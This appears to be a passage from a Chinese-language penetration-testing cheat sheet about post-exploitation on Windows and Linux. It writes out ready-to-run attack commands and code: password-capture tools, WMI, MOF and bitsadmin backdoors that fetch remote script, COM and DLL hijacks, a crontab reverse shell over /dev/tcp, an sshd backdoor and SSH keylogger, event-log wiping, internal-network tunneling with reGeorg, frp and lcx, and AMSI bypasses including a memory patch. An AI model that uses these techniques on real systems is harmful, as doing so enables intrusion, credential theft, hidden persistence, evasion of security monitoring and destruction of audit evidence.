WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。 键盘记录器 安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。 NTPass 获取管理员口令,一般用 gina 方式来,但有些机器上安装了 pcanywhere 等软件,会导致远程登录的时候出现故障,本软件可实现无障碍截取口令。 Linux 下 openssh 后门 重新编译运行的sshd服务,用于记录用户的登陆密码。

2、常用的存储Payload位置

WMI : 存储:

  1. $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
  2. $StaticClass.Name = 'Win32_Command'
  3. $StaticClass.Put()
  4. $StaticClass.Properties.Add('Command' , $Payload)
  5. $StaticClass.Put()

读取:

  1. $Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value

包含数字签名的PE文件 利用文件hash的算法缺陷,向PE文件中隐藏Payload,同时不影响该PE文件的数字签名 特殊ADS

  1. type putty.exe > ...:putty.exe
  2. wmic process call create c:\test\ads\...:putty.exe

特殊COM文件

  1. type putty.exe > \\.\C:\test\ads\COM1:putty.exe
  2. wmic process call create \\.\C:\test\ads\COM1:putty.exe

磁盘根目录

  1. type putty.exe >C:\:putty.exe
  2. wmic process call create C:\:putty.exe

3、Run/RunOnce Keys

用户级

  1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  2. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

管理员

  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  2. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  3. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

4、BootExecute Key

由于smss.exe在Windows子系统加载之前启动,因此会调用配置子系统来加载当前的配置单元,具体注册表键值为:

  1. HKLM\SYSTEM\CurrentControlSet\Control\hivelist
  2. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager

5、Userinit Key

WinLogon进程加载的login scripts,具体键值:

  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

6、Startup Keys
  1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  2. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  3. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  4. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

7、Services

创建服务

  1. sc create [ServerName] binPath= BinaryPathName

8、Browser Helper Objects

本质上是Internet Explorer启动时加载的DLL模块

  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

9、AppInit_DLLs

加载User32.dll会加载的DLL

  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs

10、文件关联
  1. HKEY_LOCAL_MACHINE\Software\Classes
  2. HKEY_CLASSES_ROOT

11、bitsadmin
  1. bitsadmin /create backdoor
  2. bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
  3. bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://host.com/calc.sct scrobj.dll"
  4. bitsadmin /Resume backdoor

12、mof
  1. pragma namespace("\\\\.\\root\\subscription")
  2. instance of __EventFilter as $EventFilter
  3. {
  4. EventNamespace = "Root\\Cimv2";
  5. Name = "filtP1";
  6. Query = "Select * From __InstanceModificationEvent "
  7. "Where TargetInstance Isa \"Win32_LocalTime\" "
  8. "And TargetInstance.Second = 1";
  9. QueryLanguage = "WQL";
  10. };
  11. instance of ActiveScriptEventConsumer as $Consumer
  12. {
  13. Name = "consP1";
  14. ScriptingEngine = "JScript";
  15. ScriptText = "GetObject(\"script:https://host.com/test\")";
  16. };
  17. instance of __FilterToConsumerBinding
  18. {
  19. Consumer = $Consumer;
  20. Filter = $EventFilter;
  21. };

管理员执行:

  1. mofcomp test.mof

13、wmi

每隔60秒执行一次notepad.exe

  1. wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
  2. wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"
  3. wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""

14、Userland Persistence With Scheduled Tasks

劫持计划任务UserTask,在系统启动时加载dll

  1. function Invoke-ScheduledTaskComHandlerUserTask
  2. {
  3. [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
  4. Param (
  5. [Parameter(Mandatory = $True)]
  6. [ValidateNotNullOrEmpty()]
  7. [String]
  8. $Command,
  9. [Switch]
  10. $Force
  11. )
  12. $ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"
  13. if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
  14. New-Item $ScheduledTaskCommandPath -Force |
  15. New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
  16. }else{
  17. Write-Verbose "Key already exists, consider using -Force"
  18. exit
  19. }
  20. if (Test-Path $ScheduledTaskCommandPath) {
  21. Write-Verbose "Created registry entries to hijack the UserTask"
  22. }else{
  23. Write-Warning "Failed to create registry key, exiting"
  24. exit
  25. }
  26. }
  27. Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose

15、Netsh
  1. netsh add helper c:\test\netshtest.dll

后门触发:每次调用netsh

dll编写:https://github.com/outflanknl/NetshHelperBeacon

16、Shim

常用方式: InjectDll RedirectShortcut RedirectEXE

17、DLL劫持

通过Rattler自动枚举进程,检测是否存在可用dll劫持利用的进程 使用:Procmon半自动测试更精准,常规生成的dll会导致程序执行报错或中断,使用AheadLib配合生成dll劫持利用源码不会影响程序执行

工具:https://github.com/sensepost/rattler

工具:https://github.com/Yonsm/AheadLib

dll劫持不多说

18、DoubleAgent)

编写自定义Verifier provider DLL 通过Application Verifier进行安装 注入到目标进程执行payload 每当目标进程启动,均会执行payload,相当于一个自启动的方式 POC : https://github.com/Cybellum/DoubleAgent

19、waitfor.exe

不支持自启动,但可远程主动激活,后台进程显示为waitfor.exe POC : https://github.com/3gstudent/Waitfor-Persistence

20、AppDomainManager

针对.Net程序,通过修改AppDomainManager能够劫持.Net程序的启动过程。如果劫持了系统常见.Net程序如powershell.exe的启动过程,向其添加payload,就能实现一种被动的后门触发机制

21、Office

劫持Office软件的特定功能:通过dll劫持,在Office软件执行特定功能时触发后门 利用VSTO实现的office后门 Office加载项

  • Word WLL
  • Excel XLL
  • Excel VBA add-ins
  • PowerPoint VBA add-ins

参考1 :https://3gstudent.github.io/Use-Office-to-maintain-persistence

参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system

22、CLR

无需管理员权限的后门,并能够劫持所有.Net程序 POC:https://github.com/3gstudent/CLR-Injection

23、msdtc

利用MSDTC服务加载dll,实现自启动,并绕过Autoruns对启动项的检测 利用:向 %windir%\system32\目录添加dll并重命名为oci.dll

24、Hijack CAccPropServicesClass and MMDeviceEnumerato

利用COM组件,不需要重启系统,不需要管理员权限 通过修改注册表实现 POC:https://github.com/3gstudent/COM-Object-hijacking

25、Hijack explorer.exe

COM组件劫持,不需要重启系统,不需要管理员权限 通过修改注册表实现

  1. HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}
  2. HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}
  3. HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
  4. HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}

26、Windows FAX DLL Injection

通过DLL劫持,劫持Explorer.exe对fxsst.dll的加载 Explorer.exe在启动时会加载c:\Windows\System32\fxsst.dll(服务默认开启,用于传真服务)将payload.dll保存在c:\Windows\fxsst.dll,能够实现dll劫持,劫持Explorer.exe对fxsst.dll的加载

27、特殊注册表键值

在注册表启动项创建特殊名称的注册表键值,用户正常情况下无法读取(使用Win32 API),但系统能够执行(使用Native API)。

《渗透技巧——“隐藏”注册表的创建》

《渗透技巧——“隐藏”注册表的更多测试》

28、快捷方式后门

替换我的电脑快捷方式启动参数 POC : https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1

29、Logon Scripts
  1. New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | Out-Null

30、Password Filter DLL

31、利用BHO实现IE浏览器劫持

Linux

crontab

每60分钟反弹一次shell给dns.wuyun.org的53端口

  1. #!bash
  2. (crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

硬链接sshd
  1. #!bash
  2. ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;

链接:ssh root@192.168.206.142 -p 2333

SSH Server wrapper
  1. #!bash
  2. cd /usr/sbin
  3. mv sshd ../bin
  4. echo '#!/usr/bin/perl' >sshd
  5. echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
  6. echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
  7. chmod u+x sshd
  8. //不用重启也行
  9. /etc/init.d/sshd restart
  10. socat STDIO TCP4:192.168.206.142:22,sourceport=13377

SSH keylogger

vim当前用户下的.bashrc文件,末尾添加

  1. #!bash
  2. alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'

source .bashrc

Cymothoa_进程注入backdoor
  1. ./cymothoa -p 2270 -s 1 -y 7777
  2. nc -vv ip 7777

rootkit

Tools

14.痕迹清理

Windows日志清除

获取日志分类列表:

  1. wevtutil el >1.txt

获取单个日志类别的统计信息: eg.

  1. wevtutil gli "windows powershell"

回显:

  1. creationTime: 2016-11-28T06:01:37.986Z
  2. lastAccessTime: 2016-11-28T06:01:37.986Z
  3. lastWriteTime: 2017-08-08T08:01:20.979Z
  4. fileSize: 1118208
  5. attributes: 32
  6. numberOfLogRecords: 1228
  7. oldestRecordNumber: 1

查看指定日志的具体内容:

  1. wevtutil qe /f:text "windows powershell"

删除单个日志类别的所有信息:

  1. wevtutil cl "windows powershell"

破坏Windows日志记录功能

利用工具

Metasploit

  1. run clearlogs
  2. clearev

3389登陆记录清除

  1. @echo off
  2. @reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
  3. @del "%USERPROFILE%\My Documents\Default.rdp" /a
  4. @exit

15.内网穿透

区分正向代理与反向代理

A——b——C

  1. A去请求C,B作为代理,代替A去访问C,并将返回的结果转发给A 那么B就是正向代理
  2. B主动与A8888端口连接,并将A:8888的访问转发到C:80上去,并将结果转发给A,则B是反向代理
  3. 反向代理优势: AB之间有防火墙,不允许AB,但是允许BA

0x01 场景与思路分析

场景一:内网防火墙对出口流量没有任何端口限制

思路 :由于防火墙对出口流量没有任何端口限制,我们的可选择的方案非常灵活,如:反弹shell

场景二:内网防火墙仅允许内网主机访问外网的特定端口(如:80, 443)

思路:由于防火墙仅允许部分特定外网端口可以访问,思路一仍然是反弹shell只不过目标端口改成特定端口即可;思路二则是端口转发,将内网主机的某些服务的端口转发到外网攻击主机上的防火墙允许的特定端口上,再通过连接外网主机上的本地端口来访问内网服务

方法一:反弹shell可参考场景一中的方法,仅需修改目标端口为防火墙允许的特定端口即可

方法二:端口转发

方法三:SSH的动态端口转发配合proxychains来代理所有流量进一步渗透内网

1.在内网主机上执行

  1. ssh -f -N -R 2222:127.0.0.1:22 -p 80 root@192.168.0.230
  2. (输入外网主机的SSH口令)

2.在外网主机上执行

  1. ssh -f -N -D 127.0.0.1:8080 -p 2222 avfisher@127.0.0.1
  2. (输入内网主机的SSH口令)

3.在外网主机上配置proxychains设置socks4代理

  1. $ vim /etc/proxychains.conf
  2. [ProxyList]
  3. socks4 127.0.0.1 8080

4.使用proxychains代理所有流量进入内网

  1. proxychains nc -nv 10.0.2.5 3306

场景三:TCP不出网-HTTP代理

一.reGeorg

reGeorg原版:https://github.com/sensepost/reGeorg
reGeorg修改版:https://github.com/L-codes/Neo-reGeorg

假设拿到的Webshell是http://aaa.com/shell.jsp,以原版reGeorg为例。

上传reGeorg中的 tunnel.jsp,假设当前URL为http://aaa.com/tunnel.jsp

在本地PC运行如下命令

  1. python reGeorgSocksProxy.py -p 8080 -h 0.0.0.0 -u http://aaa.com/tunnel.jsp

此时,将在本地PC的8080开启一个Socks端口,使用Proxifier即可进行代理。需要注意的是,由于这个http代理隧道比较脆弱,建议根据每个目标host单独添加规则,最好不要设置成全局代理。

二.pystinger

蜂刺-stinger_client

pystinger

整体结构:

1.上传 proxy.jsp到目标Web服务器,上传stinger_server/stinger_server.exe到目标系统。

2.使用Webshell启动stinger_server

  1. Linux:
  2. chmod +x /tmp/stinger_server
  3. nohup /tmp/stinger_server>/dev/null nohup.out &
  4. Windows: start D:/XXX/stinger_server.exe

3.VPS服务端启动监听

  1. ./stinger_client -w http://aaa.com/proxy.jsp -l 0.0.0.0 -p 60000

以上操作成功后,VPS会监听60000端口,接下来直接配置好Proxifier就可以访问目标内网了。

特别注意:这个代理也不是很稳定,有时候会断开(Wrong data)。遇到断开情况后,手动kill stinger_server进程 再启动,最后重启VPS服务端stinger_client即可

场景四 TCP出网-socks代理

frp

搭建步骤:
1.VPS运行服务端

  1. ./frps -c frps.ini

注:建议用Screen将frp挂起到后台,Screen挂起程序参考用screen 在后台运行程序 - 简书

frps.ini内容:

  1. [common]
  2. bind_port = 8080
  3. tls_only = true
  4. tcp_mux = true
  5. privilege_token = token123
  6. kcp_bind_port = 8080

2.使用VPS将frpc frpc.ini上传到主机tmp目录,然后运行

  1. Linux:
  2. chmod +x /tmp/frpc-x86
  3. nohup /tmp/frpc-x86 -c /tmpfrpc.ini>/dev/null nohup.out &
  4. Windows
  5. frpc -c frpc.ini

注:有时候用Webshell管理工具会上传失败或上传文件不完整,可以cd到frp目录,在vps使用 python -m SimpleHTTPServer 80 启动一个webserver,然后在客户端使用 curl http://vpsip/frpc下载文件。

以上操作成功后,VPS控制台会有输出,然后VPS会启动一个10001端口,接下来直接配置好Proxifier就可以访问目标内网了。

Proxifier使用参考:Proxifier Socks5 代理(内网访问、远程办公)

ps:frp会涉及到免杀的问题,这里推荐另一个代理工具,体积更小,可以看作是rust版本的frp

fuso

0x02 Lcx

内网IP:192.168.183.168
公网IP:192.168.183.181

端口转发

内网机器上执行命令:lcx.exe –slave 公网IP 端口 内网IP 端口
将内网的3389端口转发到公网的6666端口

  1. lcx.exe -slave 192.168.183.181 6666 192.168.183.168 3389
  2. lcx.exe -slave 192.168.183.181 6666 127.0.0.1 3389

公网机器上执行命令:lcx.exe -listen 监听端口 连接端口
将在6666端口接收到的数据转发到2222端口

  1. lcx.exe -listen 6666 2222

使用命令mstsc /v:127.0.0.1:2222即可连接到内网3389端口

端口映射

如果内网机器防火墙禁止3389出站,可以使用tran命令将3389端口映射到其他端口上
内网机器上执行命令:lcx.exe -tran 映射端口 连接IP 连接端口

  1. lcx.exe -tran 66 192.168.183.168 3389

因为实验环境是内网所以直接连接66端口即可访问3389端口,公网还需要端口转发

0x03 SSH隧道

  1. ssh参数详解:
  2. -C Enable compression 压缩数据传输
  3. -q Quiet mode. 安静模式
  4. -T Disable pseudo-tty allocation. 不占用 shell
  5. -f Requests ssh to go to background just before command execution. 后台运行,并推荐加上 -n 参数
  6. -N Do not execute a remote command. 不执行远程命令,端口转发就用它
  7. -L port:host:hostport 将本地机(客户机)的某个端口转发到远端指定机器的指定端口.
  8. -R port:host:hostport 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口.
  9. -D port 指定一个本地机器动态的应用程序端口转发.
  10. -g port 允许远程主机连接到建立的转发的端口,如果不加这个参数,只允许本地主机建立连接

SSH本地转发

语法格式:

  1. ssh -L [local_bind_addr:]local_port:remote:remote_port middle_host

远程管理服务器上的mysql,mysql不能直接root远程登陆。这时候就可以通过本地转发,通过ssh将服务器的3306端口转发到1234端口。

  1. ssh -CfNg -L 2222:127.0.0.1:3306 root@139.196.xx.xx

工作原理:在本地指定一个由ssh监听的转发端口2222,将远程主机的3306端口(127.0.0.1:3306)映射到本地的2222端口,当有主机连接本地映射的2222端口时,本地ssh就将此端口的数据包转发给中间主机VPS,然后VPS再与远程主机端口(127.0.0.1:3306)通信。
数据流向:Kali -> 2222 -> VPS -> 127.0.0.1:3306

SSH远程转发

语法格式:

  1. ssh -R [bind_addr:]remote1_port:host:port remote1

假设kali开了一个80端口的web服务,外网无法访问,使用远程转发,将kali的80端口转发到外网的其他端口,这时候访问外网的端口,就访问到了内网的端口。

  1. ssh -CfNg -R 4444:127.0.0.1:80 root@192.168.183.195

此时在192.168.183.195这台主机上访问127.0.0.1:4444端口即可访问到kali的80端口
工作原理:kali在请求外网主机的sshd服务,在外网主机上建立一个套接字监听端口(4444),它是kali的80端口的映射,当有主机连接外网的4444端口时,连接的数据全部转发给kali,再由kali去访问127.0.0.1:80。

这里要注意一点,远程端口转发是由远程主机上的sshd服务控制的,默认配置情况下,sshd服务只允许本地开启的远程转发端口(4444)绑定在环回地址(127.0.0.1)上,即使显式指定了bind_addr也无法覆盖。也就是这里访问127.0.0.1:4444端口可以访问成功,访问192.168.183.195:4444却不能访问成功。

要允许本地的远程转发端口绑定在非环回地址上,需要在外网主机的sshd配置文件中启用”GatewayPorts”项,它的默认值为no,这里将它改为yes。然后重新远程转发一下即可用外网地址访问。

SSH动态转发,正向代理做动态的端口转发

本地或远程转发端口和目标端口所代表的应用层协议是一对一的关系,不同的服务就要建立不同的端口,工作很是繁琐,而动态转发只需绑定一个本地端口,而目标端口是根据你发起的请求决定的,比如请求为445端口,通过ssh转发的请求也是445端口。

语法格式:

  1. ssh -D [bind_addr:]port remote

这里举一个最简单的列子:翻墙。国内正常情况下上不了Google,我们可以通过将流量转发到国外的vps上这样就可以正常访问了。
在本地执行以下命令,并查看建立连接情况

  1. ssh -Nfg -D 3333 root@45.77.xx.xx

连接建立成功,设置浏览器到本地主机的3333端口

SSH动态转发,正向代理进行单一的端口转发

利用ssh -L 提供正向代理,将192.168.183.2的80端口映射到45.77.xx.xx的1111端口上

访问45.77.xx.xx:1111相当于访问192.168.183.2:80 中间需要192.168.183.1的ssh进行正向代理进行利用。

语法格式:

  1. ssh -L 45.77.xx.xx:1111:192.168.183.2:80 root@192.168.183.1

此时我们访问45.77.xx.xx的1111端口就相当于访问内网不出网机器的192.168.183.2:80

16.Bypass AMSI

How to Bypass AMSI

管理员权限关闭amsi

  1. Set-MpPreference -DisableRealtimeMonitoring $true

一键关闭AMSI

  1. [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPubilc,Static').SetValue($null,$true)

被加黑了,可以混淆过

powershell降级

  1. powershell.exe -version 2 //改变powershell运行版本

内存补丁

  1. $p=@"
  2. using System;
  3. using System.Linq;
  4. using System.Runtime.InteropServices;
  5. public class Program
  6. {
  7. [DllImport("kernel32")]
  8. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  9. [DllImport("kernel32")]
  10. public static extern IntPtr LoadLibrary(string name);
  11. [DllImport("kernel32")]
  12. public static extern IntPtr VirtualProtect(IntPtr lpAddress, UIntPtr dwSize,
  13. uint flNewProtect, out uint lpfloldProtect);
  14. public static void Bypass()
  15. {
  16. String a =
  17. "isma";
  18. IntPtr lib = LoadLibrary(String.Join(""
  19. , a.Reverse().ToArray()) +
  20. "
  21. .dll");
  22. IntPtr addr = GetProcAddress(lib,
  23. "AmsiOpenSession");
  24. uint old = 0;
  25. byte[] p;
  26. p = new byte[6];
  27. p[0] = 0xB8;
  28. p[1] = 0xFF;
  29. p[2] = 0xFF;
  30. p[3] = 0xFF;
  31. p[4] = 0xFF;
  32. p[5] = 0xC3;
  33. VirtualProtect(addr, (UIntPtr)p.Length, 0x04, out old);
  34. Marshal.Copy(p, 0, addr, p.Length);
  35. VirtualProtect(addr, (UIntPtr)p.Length, old, out old);
  36. }
  37. }
  38. "@
  39. Add-Type $p
  40. [Program]::Bypass()

参考链接:

  1. https://github.com/NyDubh3/Pentesting-Active-Directory-CN
  2. https://github.com/shmilylty/Intranet_Penetration_Tips